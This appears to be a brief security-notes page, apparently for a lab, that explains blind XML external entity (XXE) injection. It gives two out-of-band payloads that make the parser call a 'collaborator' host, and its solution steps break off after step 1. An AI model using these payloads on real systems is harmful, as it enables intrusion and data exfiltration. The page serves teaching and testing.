Blind XXE

What is it?

Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes the exploitation less direct since the attacker does not receive an immediate output from the injected payload. Blind XXE can be exploited to exfiltrate data, scan internal systems, or execute remote requests within the network that hosts the vulnerable application.

Exploitation

Blind XXE using OOB

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
  <bar>&xxe;</bar>
</foo>

Blind XXE using OOB with XML parameter entities

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>

Solution

1. Check the stock of an item and send the POST request with XML to repeater

2.

PreviousXXE (XML external entity) injection NextTemplate injection

Last updated 7 months ago